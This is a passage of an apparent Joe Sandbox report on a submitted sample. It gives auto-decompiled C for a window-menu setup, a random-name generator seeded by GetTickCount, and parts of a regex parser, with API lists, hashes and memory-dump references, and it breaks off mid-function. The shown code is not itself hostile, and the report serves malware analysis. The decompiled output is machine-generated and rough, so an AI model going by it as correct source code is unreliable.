_CxxThrowException.MSVCRT(?,004196F8), ref: 0040BCA1
toupper.MSVCRT ref: 0040BCC6
tolower.MSVCRT ref: 0040BCE8

Strings

invalid range specified in character set, xrefs: 0040BC69, 0040BC6E, 0040BC76

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: ExceptionH_prologThrowstrlentolowertoupper
String ID: invalid range specified in character set
API String ID: 1623458934-400550818
Opcode ID: 0e24881944c7c0c498e365fc8964e77618a0ccef3bb12c5c82b08ac14b24d4ad
Instruction ID: cd9e26891659f9ba17b876740d84c57d5df747751494f0963a811352e82b1091
Opcode Fuzzy Hash: 0e24881944c7c0c498e365fc8964e77618a0ccef3bb12c5c82b08ac14b24d4ad
Instruction Fuzzy Hash: 9E311432500155AFDB08DF64D8917FDBBB4EF44350F10806BF566DA1C1DBB89A85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040199E Relevance: 9.1, APIs: 6, Instructions: 61
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040199E(void* __ecx) {
				struct HMENU__* _t19;
				void* _t22;
				struct HMENU__* _t27;
				void* _t41;
				void* _t43;

				L004153D0();
				_push(__ecx);
				_t41 = __ecx;
				L00415232();
				_t19 = GetSystemMenu( *(__ecx + 0x20), 0);
				_push(_t19);
				L00415304();
				_t27 = _t19;
				if(_t27 != 0) {
					L004152EC();
					_push(0x65);
					 *(_t43 - 4) = 0;
					L004152FE();
					if( *((intOrPtr*)( *(_t43 - 0x10) - 8)) != 0) {
						AppendMenuA( *(_t27 + 4), 0x800, 0, 0);
						AppendMenuA( *(_t27 + 4), 0, 0x10,  *(_t43 - 0x10));
					}
					 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
					L00415214();
				}
				SendMessageA( *(_t41 + 0x20), 0x80, 1,  *(_t41 + 0x80));
				SendMessageA( *(_t41 + 0x20), 0x80, 0,  *(_t41 + 0x80));
				_t22 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t22;
			}

0x004019a3
0x004019a8
0x004019ac
0x004019ae
0x004019b9
0x004019bf
0x004019c0
0x004019c5
0x004019c9
0x004019ce
0x004019d3
0x004019d8
0x004019db
0x004019e6
0x004019f8
0x00401a04
0x00401a04
0x00401a06
0x00401a0d
0x00401a0d
0x00401a2e
0x00401a3c
0x00401a43
0x00401a47
0x00401a4f

APIs

_EH_prolog.MSVCRT ref: 004019A3
GetSystemMenu.USER32(?,00000000), ref: 004019B9
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 004019F8
AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401A04
SendMessageA.USER32(?,00000080,00000001,?), ref: 00401A2E
SendMessageA.USER32(?,00000080,00000000,?), ref: 00401A3C

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: Menu$AppendMessageSend$H_prologSystem
String ID:
API String ID: 2469542211-0
Opcode ID: b776af5b621d7cd78022760181e20f7924a719f0e5e1bcefeefb39d5102cff14
Instruction ID: 5be617b225bb215d29ef40c61bba07445f241ab3afedab8fc5c110dbd8f57498
Opcode Fuzzy Hash: b776af5b621d7cd78022760181e20f7924a719f0e5e1bcefeefb39d5102cff14
Instruction Fuzzy Hash: FD11B232640604EBDB21ABA1CC81FDEBB71FF84B00F10452AF555660E1DBB56840DF18

Uniqueness

Uniqueness Score: -1.00%

Function 0040107C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040107C(intOrPtr _a4, signed int _a8) {
				void _v32;
				signed int _t19;
				signed int _t22;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t39;
				void* _t40;

				_t26 = 6;
				memcpy( &_v32, "ekimhuqcroanflvzgdjtxypswb", _t26 << 2);
				asm("movsw");
				asm("movsb");
				srand(GetTickCount());
				_t19 = rand();
				asm("cdq");
				_t29 = 0xa;
				_t25 = _t19 % _t29;
				if(_t25 < _a8) {
					_t25 = _a8;
				}
				_t39 = 0;
				if(_t25 > 0) {
					do {
						_t22 = rand();
						asm("cdq");
						_t30 = 0x1a;
						 *((char*)(_t39 + _a4)) =  *((intOrPtr*)(_t40 + _t22 % _t30 - 0x1c));
						_t39 = _t39 + 1;
					} while (_t39 < _t25);
				}
				return _t25;
			}

0x00401087
0x00401090
0x00401092
0x00401094
0x0040109c
0x004010a9
0x004010ad
0x004010ae
0x004010b1
0x004010b6
0x004010b8
0x004010b8
0x004010bb
0x004010bf
0x004010c1
0x004010c1
0x004010c5
0x004010c6
0x004010d0
0x004010d3
0x004010d4
0x004010c1
0x004010de

APIs

GetTickCount.KERNEL32 ref: 00401095
srand.MSVCRT ref: 0040109C
rand.MSVCRT ref: 004010A9
rand.MSVCRT ref: 004010C1

Strings

ekimhuqcroanflvzgdjtxypswb, xrefs: 00401088

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: rand$CountTicksrand
String ID: ekimhuqcroanflvzgdjtxypswb
API String ID: 3923125369-3762667353
Opcode ID: b82129336e1194dd03dfb6d02705f8909e6a668a9130fe837ce4919de25d8751
Instruction ID: 6e7471b6b191c25231bb1943ac2c278cbb6d4f2c92849cbbbbe3a5302c238a81
Opcode Fuzzy Hash: b82129336e1194dd03dfb6d02705f8909e6a668a9130fe837ce4919de25d8751
Instruction Fuzzy Hash: 93F04C337043449BC720BF5A6CC4D9BBFA99B89720F01807AFD4067381C5B5944386B5

Uniqueness

Uniqueness Score: -1.00%

Function 00405730 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 497
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00405730(intOrPtr* __ebx, signed int* __edi, char* __esi) {
				intOrPtr* _t197;
				intOrPtr _t202;
				intOrPtr _t211;
				intOrPtr _t212;
				intOrPtr _t217;
				intOrPtr _t223;
				intOrPtr _t228;
				intOrPtr _t233;
				intOrPtr _t238;
				intOrPtr _t243;
				signed char _t250;
				intOrPtr _t252;
				intOrPtr* _t268;
				intOrPtr _t270;
				intOrPtr _t273;
				void* _t274;
				intOrPtr _t278;
				void* _t286;
				intOrPtr* _t291;
				intOrPtr _t293;
				intOrPtr _t297;
				intOrPtr* _t302;
				intOrPtr _t306;
				signed int _t309;
				void* _t312;
				intOrPtr _t317;
				signed int _t319;
				signed int _t322;
				void* _t325;
				signed int _t326;
				signed int _t329;
				signed int _t332;
				signed int _t335;
				signed int _t338;
				intOrPtr* _t343;
				signed int _t345;
				signed int _t354;
				signed int _t360;
				signed int _t368;
				intOrPtr _t371;
				signed int _t372;
				signed int* _t399;
				char* _t401;
				void* _t403;

				_t401 = __esi;
				_t399 = __edi;
				_t302 = __ebx;
				 *(_t403 + 8) = __esi[0x27];
				 *0x41720c();
				asm("sbb edx, edx");
				_t197 =  *__ebx;
				if(( ~( *( *(_t403 + 8) + 4)) &  *((intOrPtr*)( *(_t403 + 8) + 8)) +  *( *(_t403 + 8) + 4)) != _t197) {
					_t306 =  *_t197;
					if(_t306 < 0x30 || _t306 > 0x39) {
						if(_t306 != 0x65) {
							if(_t306 != 0x78) {
								if(_t306 != 0x63) {
									if(_t306 != 0x61 ||  *(_t403 + 0x13) == 0) {
										if(_t306 != 0x66 ||  *(_t403 + 0x13) == 0) {
											if(_t306 != 0x6e ||  *(_t403 + 0x13) == 0) {
												if(_t306 != 0x72 ||  *(_t403 + 0x13) == 0) {
													if(_t306 != 0x74 ||  *(_t403 + 0x13) == 0) {
														if(_t306 != 0x5c ||  *(_t403 + 0x13) == 0) {
															_push(_t399);
															_push(_t306);
															if(E00409CBB() == 0) {
																_t309 =  &(_t401[4]);
																_t202 = E00409BC5(_t401,  *((intOrPtr*)( *_t302)),  *_t399, _t309);
																 *((intOrPtr*)(_t403 - 0x10)) = _t202;
																 *((char*)(_t403 - 0x14)) = _t309 & 0xffffff00 | _t202 != 0x00000000;
																E0040BF91(_t403 - 0x24, _t403 - 0x14);
																_t312 = _t403 - 0x14;
															} else {
																_t319 =  *_t399;
																_t212 = E00409B0F(_t198, _t319,  &(_t401[4]));
																 *((intOrPtr*)(_t403 - 0x10)) = _t212;
																 *((char*)(_t403 - 0x14)) = _t319 & 0xffffff00 | _t212 != 0x00000000;
																E0040BF91(_t403 - 0x24, _t403 - 0x14);
																_t312 = _t403 - 0x14;
															}
															goto L6;
														} else {
															_t322 =  &(_t401[4]);
															 *_t302 = _t197 + 1;
															_t217 = E00409BC5(_t401, 0x5c,  *_t399, _t322);
															 *((intOrPtr*)(_t403 - 0x10)) = _t217;
															 *((char*)(_t403 - 0x14)) = _t322 & 0xffffff00 | _t217 != 0x00000000;
															E0040BF91(_t403 - 0x24, _t403 - 0x14);
															_t325 = _t403 - 0x14;
															goto L57;
														}
													} else {
														_t326 =  &(_t401[4]);
														 *_t302 = _t197 + 1;
														_t223 = E00409BC5(_t401, 9,  *_t399, _t326);
														 *((intOrPtr*)(_t403 - 0x10)) = _t223;
														 *((char*)(_t403 - 0x14)) = _t326 & 0xffffff00 | _t223 != 0x00000000;
														E0040BF91(_t403 - 0x24, _t403 - 0x14);
														_t325 = _t403 - 0x14;
														goto L57;
													}
												} else {
													_t329 =  &(_t401[4]);
													 *_t302 = _t197 + 1;
													_t228 = E00409BC5(_t401, 0xd,  *_t399, _t329);
													 *((intOrPtr*)(_t403 - 0x10)) = _t228;
													 *((char*)(_t403 - 0x14)) = _t329 & 0xffffff00 | _t228 != 0x00000000;
													E0040BF91(_t403 - 0x24, _t403 - 0x14);
													_t325 = _t403 - 0x14;
													goto L57;
												}
											} else {
												_t332 =  &(_t401[4]);
												 *_t302 = _t197 + 1;
												_t233 = E00409BC5(_t401, 0xa,  *_t399, _t332);
												 *((intOrPtr*)(_t403 - 0x10)) = _t233;
												 *((char*)(_t403 - 0x14)) = _t332 & 0xffffff00 | _t233 != 0x00000000;
												E0040BF91(_t403 - 0x24, _t403 - 0x14);
												_t325 = _t403 - 0x14;
												goto L57;
											}
										} else {
											_t335 =  &(_t401[4]);
											 *_t302 = _t197 + 1;
											_t238 = E00409BC5(_t401, 0xc,  *_t399, _t335);
											 *((intOrPtr*)(_t403 - 0x10)) = _t238;
											 *((char*)(_t403 - 0x14)) = _t335 & 0xffffff00 | _t238 != 0x00000000;
											E0040BF91(_t403 - 0x24, _t403 - 0x14);
											_t325 = _t403 - 0x14;
											goto L57;
										}
									} else {
										_t338 =  &(_t401[4]);
										 *_t302 = _t197 + 1;
										_t243 = E00409BC5(_t401, 7,  *_t399, _t338);
										 *((intOrPtr*)(_t403 - 0x10)) = _t243;
										 *((char*)(_t403 - 0x14)) = _t338 & 0xffffff00 | _t243 != 0x00000000;
										E0040BF91(_t403 - 0x24, _t403 - 0x14);
										_t325 = _t403 - 0x14;
										goto L57;
									}
								}
								 *(_t403 + 0x10) = _t401[0x27];
								 *0x41720c();
								 *_t302 =  *_t302 + 1;
								_t343 =  *_t302;
								asm("sbb edx, edx");
								if(( ~( *( *(_t403 + 0x10) + 4)) &  *((intOrPtr*)( *(_t403 + 0x10) + 8)) +  *( *(_t403 + 0x10) + 4)) == _t343) {
									 *((char*)(_t403 - 0x54)) =  *((intOrPtr*)(_t403 + 0xf));
									 *0x417230(0);
									_t401 = "incomplete escape sequence \\c";
									 *0x417234(_t401, strlen(_t401));
									_t343 = _t403 - 0xb8;
									 *(_t403 - 4) = 6;
									E00404FA7(_t343, _t403 - 0x54);
									_push(0x4196f8);
									_push(_t403 - 0xb8);
									 *((intOrPtr*)(_t403 - 0xb8)) = 0x417698;
									L004153FE();
								}
								_t250 =  *_t343;
								 *_t302 = _t343 + 1;
								if(_t250 >= 0x61 && _t250 <= 0x7a) {
									_t250 =  *0x4172a4(_t250);
								}
								_t345 =  *_t399;
								_t252 = E00409BC5(_t401, _t250 ^ 0x00000040, _t345,  &(_t401[4]));
								 *((intOrPtr*)(_t403 - 0x10)) = _t252;
								 *((char*)(_t403 - 0x14)) = _t345 & 0xffffff00 | _t252 != 0x00000000;
								E0040BF91(_t403 - 0x24, _t403 - 0x14);
								_t325 = _t403 - 0x14;
								goto L57;
							}
							 *(_t403 + 8) =  *(_t403 + 8) & 0x00000000;
							 *(_t403 + 0x13) =  *(_t403 + 0x13) & 0x00000000;
							 *_t302 = _t197 + 1;
							while(1) {
								 *(_t403 + 0x14) = _t401[0x27];
								 *0x41720c();
								asm("sbb edx, edx");
								_t268 =  *_t302;
								if(( ~( *( *(_t403 + 0x14) + 4)) &  *((intOrPtr*)( *(_t403 + 0x14) + 8)) +  *( *(_t403 + 0x14) + 4)) == _t268) {
									break;
								}
								_t273 =  *_t268;
								if(_t273 < 0x30 || _t273 > 0x39) {
									if(_t273 < 0x61 || _t273 > 0x66) {
										if(_t273 < 0x41 || _t273 > 0x46) {
											break;
										} else {
											goto L30;
										}
									} else {
										goto L30;
									}
								} else {
									L30:
									_t274 = E00402FBD(_t273);
									 *(_t403 + 0x13) =  *(_t403 + 0x13) + 1;
									 *_t302 =  *_t302 + 1;
									 *(_t403 + 8) = _t274 + ( *(_t403 + 8) << 4);
									if( *(_t403 + 0x13) < 2) {
										continue;
									}
									break;
								}
							}
							_t354 =  &(_t401[4]);
							_t270 = E00409BC5(_t401,  *(_t403 + 8),  *_t399, _t354);
							 *((intOrPtr*)(_t403 - 0x10)) = _t270;
							 *((char*)(_t403 - 0x14)) = _t354 & 0xffffff00 | _t270 != 0x00000000;
							E0040BF91(_t403 - 0x24, _t403 - 0x14);
							_t325 = _t403 - 0x14;
							goto L57;
						}
						_t360 =  &(_t401[4]);
						 *_t302 = _t197 + 1;
						_t278 = E00409BC5(_t401, 0x1b,  *_t399, _t360);
						 *((intOrPtr*)(_t403 - 0x10)) = _t278;
						 *((char*)(_t403 - 0x14)) = _t360 & 0xffffff00 | _t278 != 0x00000000;
						E0040BF91(_t403 - 0x24, _t403 - 0x14);
						_t325 = _t403 - 0x14;
						goto L57;
					} else {
						 *((intOrPtr*)(_t403 - 0x28)) = _t197;
						 *(_t403 + 0x10) = __esi[0x27];
						 *0x41720c();
						asm("sbb edx, edx");
						_t286 = E004090FF(_t403 - 0x28,  ~( *( *(_t403 + 0x10) + 4)) &  *((intOrPtr*)( *(_t403 + 0x10) + 8)) +  *( *(_t403 + 0x10) + 4), 0x3e7);
						if( *((char*)( *__ebx)) == 0x30 || _t286 >= 0xa && _t286 >= __esi[0xb]) {
							 *(_t403 + 8) =  *(_t403 + 8) & 0x00000000;
							 *(_t403 + 0x13) =  *(_t403 + 0x13) & 0x00000000;
							while(1) {
								 *(_t403 + 0x14) = _t401[0x27];
								 *0x41720c();
								asm("sbb edx, edx");
								_t291 =  *_t302;
								if(( ~( *( *(_t403 + 0x14) + 4)) &  *((intOrPtr*)( *(_t403 + 0x14) + 8)) +  *( *(_t403 + 0x14) + 4)) == _t291) {
									break;
								}
								_t371 =  *_t291;
								if(_t371 >= 0x30 && _t371 <= 0x37) {
									 *(_t403 + 0x13) =  *(_t403 + 0x13) + 1;
									 *(_t403 + 8) = ( *(_t403 + 8) - 6 << 3) + _t371;
									 *_t302 = _t291 + 1;
									if( *(_t403 + 0x13) < 3) {
										continue;
									}
								}
								break;
							}
							_t368 =  &(_t401[4]);
							_t293 = E00409BC5(_t401,  *(_t403 + 8),  *_t399, _t368);
							 *((intOrPtr*)(_t403 - 0x10)) = _t293;
							 *((char*)(_t403 - 0x14)) = _t368 & 0xffffff00 | _t293 != 0x00000000;
							E0040BF91(_t403 - 0x24, _t403 - 0x14);
							_t325 = _t403 - 0x14;
							L57:
							E00406ED3(_t325);
						} else {
							_t372 =  *_t399;
							_t297 = E00409C62(_t286, _t372,  &(_t401[4]));
							 *((intOrPtr*)(_t403 - 0x10)) = _t297;
							 *((char*)(_t403 - 0x14)) = _t372 & 0xffffff00 | _t297 != 0x00000000;
							E0040BF91(_t403 - 0x24, _t403 - 0x14);
							E00406ED3(_t403 - 0x14);
							 *_t302 =  *((intOrPtr*)(_t403 - 0x28));
						}
						goto L1;
					}
				} else {
					__ecx =  *__edi;
					 *__ebx = __eax;
					__eax = E00409BC5(__esi, __eax,  *__edi, __esi + 4);
					 *((intOrPtr*)(__ebp - 0x10)) = __eax;
					__ecx = __ecx & 0xffffff00 | __eax != 0x00000000;
					__eax = __ebp - 0x14;
					 *(__ebp - 0x14) = __cl;
					__ecx = __ebp - 0x24;
					__eax = E0040BF91(__ebp - 0x24, __ebp - 0x14);
					__ecx = __ebp - 0x14;
					L6:
					E00406ED3(_t312);
					 *_t302 =  *_t302 + 1;
				}
				L1:
				if( *((intOrPtr*)(_t403 - 0x20)) != 0) {
					_push(_t399);
					_push( *((intOrPtr*)(_t403 - 0x34)));
					_push(_t302);
					_push(_t403 - 0x24);
					E00408D03(_t401);
					_t211 =  *((intOrPtr*)(_t403 + 0xc));
					_t317 =  *((intOrPtr*)(_t403 - 0x20));
					 *(_t403 - 0x24) =  *(_t403 - 0x24) & 0x00000000;
					 *((intOrPtr*)( *((intOrPtr*)(_t211 + 0x1c)))) = _t317;
					 *((intOrPtr*)(_t211 + 0x1c)) = _t317 + 4;
				}
				 *(_t403 - 4) =  *(_t403 - 4) & 0x00000000;
				E0040C5ED(_t403 - 0x30);
				 *(_t403 - 4) =  *(_t403 - 4) | 0xffffffff;
				E00406ED3(_t403 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t403 - 0xc));
				return 1;
			}

0x00405730
0x00405730
0x00405730
0x00405733
0x00405736
0x0040574b
0x0040574f
0x00405753
0x00405790
0x00405795
0x004058a9
0x004058e1
0x00405982
0x00405a51
0x00405a8f
0x00405acd
0x00405b0b
0x00405b46
0x00405b81
0x00405bc1
0x00405bc2
0x00405bcc
0x00405bff
0x00405c09
0x00405c11
0x00405c1c
0x00405c23
0x00405c28
0x00405bce
0x00405bce
0x00405bd6
0x00405bde
0x00405be9
0x00405bf0
0x00405bf5
0x00405bf5
0x00000000
0x00405b89
0x00405b8a
0x00405b8d
0x00405b95
0x00405b9d
0x00405ba8
0x00405baf
0x00405bb4
0x00000000
0x00405bb4
0x00405b4e
0x00405b4f
0x00405b52
0x00405b5a
0x00405b62
0x00405b6d
0x00405b74
0x00405b79
0x00000000
0x00405b79
0x00405b13
0x00405b14
0x00405b17
0x00405b1f
0x00405b27
0x00405b32
0x00405b39
0x00405b3e
0x00000000
0x00405b3e
0x00405ad5
0x00405ad6
0x00405ad9
0x00405ae1
0x00405ae9
0x00405af4
0x00405afb
0x00405b00
0x00000000
0x00405b00
0x00405a97
0x00405a98
0x00405a9b
0x00405aa3
0x00405aab
0x00405ab6
0x00405abd
0x00405ac2
0x00000000
0x00405ac2
0x00405a59
0x00405a5a
0x00405a5d
0x00405a65
0x00405a6d
0x00405a78
0x00405a7f
0x00405a84
0x00000000
0x00405a84
0x00405a51
0x0040598b
0x0040598e
0x0040599a
0x004059a3
0x004059a7
0x004059ad
0x004059b7
0x004059ba
0x004059c0
0x004059d1
0x004059da
0x004059e1
0x004059e5
0x004059f0
0x004059f5
0x004059f6
0x00405a00
0x00405a00
0x00405a05
0x00405a0a
0x00405a0c
0x00405a16
0x00405a1c
0x00405a1d
0x00405a27
0x00405a2f
0x00405a3a
0x00405a41
0x00405a46
0x00000000
0x00405a46
0x004058e7
0x004058eb
0x004058f0
0x004058f2
0x004058f5
0x004058f8
0x0040590d
0x00405911
0x00405915
0x00000000
0x00000000
0x00405917
0x0040591b
0x00405923
0x0040592b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405931
0x00405931
0x00405932
0x00405940
0x00405943
0x00405949
0x0040594c
0x00000000
0x00000000
0x00000000
0x0040594c
0x0040591b
0x00405950
0x00405958
0x00405960
0x0040596b
0x00405972
0x00405977
0x00000000
0x00405977
0x004058ac
0x004058af
0x004058b7
0x004058bf
0x004058ca
0x004058d1
0x004058d6
0x00000000
0x004057a4
0x004057a7
0x004057aa
0x004057ad
0x004057c7
0x004057d0
0x004057dd
0x00405822
0x00405826
0x0040582a
0x0040582d
0x00405830
0x00405845
0x00405849
0x0040584d
0x00000000
0x00000000
0x0040584f
0x00405854
0x00405866
0x0040586e
0x00405871
0x00405873
0x00000000
0x00000000
0x00405873
0x00000000
0x00405854
0x00405877
0x0040587f
0x00405887
0x00405892
0x00405899
0x0040589e
0x00405bb7
0x00405bb7
0x004057e9
0x004057e9
0x004057f1
0x004057f9
0x00405804
0x0040580b
0x00405813
0x0040581b
0x0040581b
0x00000000
0x004057dd
0x00405755
0x00405755
0x0040575b
0x00405762
0x0040576a
0x0040576f
0x00405772
0x00405775
0x00405779
0x0040577c
0x00405781
0x00405784
0x00405784
0x00405789
0x00405789
0x00405321
0x00405325
0x00405327
0x0040532b
0x00405330
0x00405331
0x00405332
0x00405337
0x0040533a
0x0040533d
0x00405344
0x00405349
0x00405349
0x0040534c
0x00405353
0x00405358
0x0040535f
0x0040536c
0x00405374

Strings

incomplete escape sequence \c, xrefs: 004059C0, 004059C5, 004059CD

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: tolowertoupper
String ID: incomplete escape sequence \c
API String ID: 1080271956-949001438
Opcode ID: 39bb49a1a08b3dd777d864a793be88eea520dc48117c4783dab6732a6018448f
Instruction ID: 44cb3acf87c3d58dae45ce2b98c07f36b87c2adb796d601b5b08f860e8cdf80f
Opcode Fuzzy Hash: 39bb49a1a08b3dd777d864a793be88eea520dc48117c4783dab6732a6018448f
Instruction Fuzzy Hash: 1202A0B190064A9FDB15CF64C991AEF77B4EF44304F14406AE852B7281EB78AF14CF66

Uniqueness

Uniqueness Score: -1.00%

Function 00408D03 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 246
stringCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00408D03(char* __ecx) {
				signed int _t104;
				intOrPtr _t112;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				signed int _t124;
				void* _t130;
				signed int _t134;
				void* _t140;
				void* _t148;
				void* _t149;
				signed char* _t151;
				signed int _t164;
				signed int _t203;
				void* _t215;
				intOrPtr _t216;
				signed char** _t217;
				char _t221;
				char _t224;
				void* _t226;
				char* _t227;
				void* _t230;

				L004153D0();
				_t227 = __ecx;
				_t216 =  *((intOrPtr*)(__ecx + 0x27));
				 *0x41720c(_t215, _t226, _t149);
				_t104 =  *(_t216 + 4);
				_t217 =  *(_t230 + 0xc);
				asm("sbb ecx, ecx");
				if(( ~_t104 &  *((intOrPtr*)(_t216 + 8)) + _t104) !=  *_t217) {
					_t151 =  *(_t230 + 8);
					_t104 =  *((intOrPtr*)( *(_t151[4]) + 0x28))();
					if(_t104 == 0) {
						_t219 =  *((intOrPtr*)(__ecx + 0x27));
						 *(_t230 - 0xd) =  *(_t230 - 0xd) & 0x00000000;
						 *(_t230 - 0x1c) =  *(_t230 - 0x1c) | 0xffffffff;
						 *(_t230 - 0x14) =  *_t217;
						 *0x41720c();
						_t203 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x27)) + 8)) +  *(_t219 + 4);
						asm("sbb ecx, ecx");
						_t104 = E00406B76( *((intOrPtr*)(_t230 + 0x14)), _t230 - 0x14,  ~( *(_t219 + 4)) & _t203) - 9;
						if(_t104 == 0) {
							L28:
							 *(_t230 - 0x18) = 1;
							goto L30;
						} else {
							_t117 = _t104 - 1;
							if(_t117 == 0) {
								L26:
								 *(_t230 - 0x18) =  *(_t230 - 0x18) & 0x00000000;
								goto L31;
							} else {
								_t118 = _t117 - 1;
								if(_t118 == 0) {
									L24:
									 *(_t230 - 0x18) =  *(_t230 - 0x18) & 0x00000000;
									 *(_t230 - 0x1c) = 1;
									goto L31;
								} else {
									_t104 = _t118 - 1;
									if(_t104 == 0) {
										 *(_t230 - 0xd) = 1;
										goto L28;
									} else {
										_t119 = _t104 - 1;
										if(_t119 == 0) {
											 *(_t230 - 0xd) = 1;
											goto L26;
										} else {
											_t120 = _t119 - 1;
											if(_t120 == 0) {
												L23:
												 *(_t230 - 0xd) = 1;
												goto L24;
											} else {
												_t104 = _t120 - 1;
												if(_t104 == 0) {
													 *0x41720c();
													asm("sbb ecx, ecx");
													_t124 = E004090FF(_t230 - 0x14,  ~( *(_t227[0x27] + 4)) &  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t227[0x27] + 4), 0xffffffff);
													_t221 = _t227[0x27];
													 *(_t230 - 0x18) = _t124;
													 *0x41720c();
													_t104 =  *(_t221 + 4);
													asm("sbb ecx, ecx");
													if(( ~_t104 &  *((intOrPtr*)(_t221 + 8)) + _t104) !=  *(_t230 - 0x14)) {
														_t222 = _t227[0x27];
														 *0x41720c();
														_t203 =  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t222 + 4);
														asm("sbb ecx, ecx");
														_t130 = E00406B76( *((intOrPtr*)(_t230 + 0x14)), _t230 - 0x14,  ~( *(_t222 + 4)) & _t203) - 0x10;
														if(_t130 == 0) {
															_t151 =  *(_t230 - 0x14);
															 *0x41720c();
															asm("sbb ecx, ecx");
															_t134 = E004090FF(_t230 - 0x14,  ~( *(_t227[0x27] + 4)) &  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t227[0x27] + 4), 0xffffffff);
															if( *(_t230 - 0x14) != _t151) {
																 *(_t230 - 0x1c) = _t134;
															}
															_t224 = _t227[0x27];
															 *0x41720c();
															_t104 =  *(_t224 + 4);
															asm("sbb ecx, ecx");
															if( *(_t230 - 0x14) != ( ~_t104 &  *((intOrPtr*)(_t224 + 8)) + _t104)) {
																_t225 = _t227[0x27];
																 *0x41720c();
																_t203 =  *((intOrPtr*)(_t227[0x27] + 8)) +  *(_t225 + 4);
																asm("sbb ecx, ecx");
																_t140 = E00406B76( *((intOrPtr*)(_t230 + 0x14)), _t230 - 0x14,  ~( *(_t225 + 4)) & _t203) - 0x11;
																if(_t140 == 0) {
																	L21:
																	_t104 =  *(_t230 - 0x1c);
																	if(_t104 >=  *(_t230 - 0x18)) {
																		_t151 =  *(_t230 + 8);
																		goto L30;
																	} else {
																		 *((char*)(_t230 - 0x3c)) =  *((intOrPtr*)(_t230 + 0x13));
																		 *0x417230(0);
																		_t227 = "Can\'t do {n, m} with n > m";
																		 *0x417234(_t227, strlen(_t227));
																		 *(_t230 - 4) =  *(_t230 - 4) & 0x00000000;
																		 *0x417218(_t230 - 0x3c);
																		_push(0x4196f8);
																		_push(_t230 - 0x58);
																		 *((intOrPtr*)(_t230 - 0x58)) = 0x417698;
																		L004153FE();
																		goto L23;
																	}
																} else {
																	_t104 = _t140 - 1;
																	if(_t104 == 0) {
																		 *(_t230 - 0xd) = 1;
																		goto L21;
																	}
																}
															}
														} else {
															_t148 = _t130 - 1;
															if(_t148 == 0) {
																L14:
																_t104 =  *(_t230 - 0x18);
																 *(_t230 - 0x1c) = _t104;
																L30:
																if( *(_t230 - 0x18) != 0xffffffff) {
																	L31:
																	if( *((char*)(_t230 + 0x10)) != 0 &&  *(_t230 - 0x1c) > 0x10) {
																		_t227[0xa] = _t227[0xa] & 0x00000000;
																	}
																	_t164 = _t151[4];
																	_t112 =  *((intOrPtr*)( *_t164 + 0x1c))( *(_t230 - 0x18),  *(_t230 - 0x1c), _t203 & 0xffffff00 |  *(_t230 - 0xd) == 0x00000000,  &(_t227[4]));
																	 *((intOrPtr*)(_t230 - 0x28)) = _t112;
																	 *_t151 =  *_t151 & 0x00000000;
																	 *(_t230 - 0x2c) =  *(_t230 - 0x2c) & 0x00000000;
																	 *((intOrPtr*)(_t230 - 0x20)) = _t112;
																	 *((char*)(_t230 - 0x24)) = _t164 & 0xffffff00 | _t112 != 0x00000000;
																	 *(_t230 - 4) = 1;
																	E0040BF91(_t151, _t230 - 0x24);
																	E00406ED3(_t230 - 0x24);
																	 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
